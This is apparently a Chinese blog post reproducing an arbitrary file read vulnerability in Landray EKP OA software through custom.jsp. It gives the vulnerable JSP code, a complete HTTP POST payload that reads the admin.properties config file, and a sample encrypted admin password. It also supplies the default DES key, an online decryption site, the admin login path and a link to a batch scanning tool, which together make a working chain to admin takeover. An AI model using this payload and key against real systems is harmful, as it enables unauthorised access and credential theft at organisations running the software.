- A+
所属分类:漏洞复现
漏洞描述:
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息
|
1 |
http://x.x.x.x/admin.do |
漏洞利用:
利用custom.jsp任意文件读取漏洞来读取配置文件
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
<%@page import="com.landray.kmss.util.ResourceUtil"%> <%@page import="net.sf.json.JSONArray"%> <%@page import="net.sf.json.JSONObject"%> <%@ page language="java" pageEncoding="UTF-8"%> <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%> <% JSONObject vara = JSONObject.fromObject(request.getParameter("var")); JSONObject body = JSONObject.fromObject(vara.get("body")); %> <c:import url='<%=body.getString("file") %>'> <c:param name="var" value="${ param['var'] }"></c:param> </c:import> |
Payload:
|
1 2 3 4 5 6 7 8 9 |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: x.x.x.x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Content-Length: 60 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}} |
管理后台的登陆密码经过DES加密算法加密,可以通过读取/WEB-INF/KmssConfig/admin.properties 的配置文件获取密文: chuciDiIU2nhEz\/JLVTdUw==
|
1 |
默认key:kmssAdminKey |
拿到DES密文后,在DES在线网站来获取明文
在线解密网站:
|
1 |
http://tool.chacuo.net/cryptdes |
蓝凌oa后台地址:
|
1 |
http://x.x.x.x/admin.do |
使用解密后的密码成功登陆管理后台
批量检测脚本
|
1 |
https://github.com/Cr4y0nXX/LandrayReadAnyFile |
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
